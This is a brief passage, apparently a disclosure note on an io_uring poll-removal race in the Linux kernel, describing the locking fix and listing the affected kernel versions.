While reworking the poll hashing in the v6.0 kernel, we ended up grabbing the ctx->uring_lock in poll update/removal. This also fixed a bug with linked timeouts racing with timeout expiry and poll removal. Bring back just the locking fix for that.

My reproducer was still able to crash upstream (Because the uring_lock was only held selectively).
The final patch just holds the uring_lock while removing (and completing) a poll request. Versions 5.13 - 6.4 and 5.10.162 - 5.10.185 were affected.
Patch commits: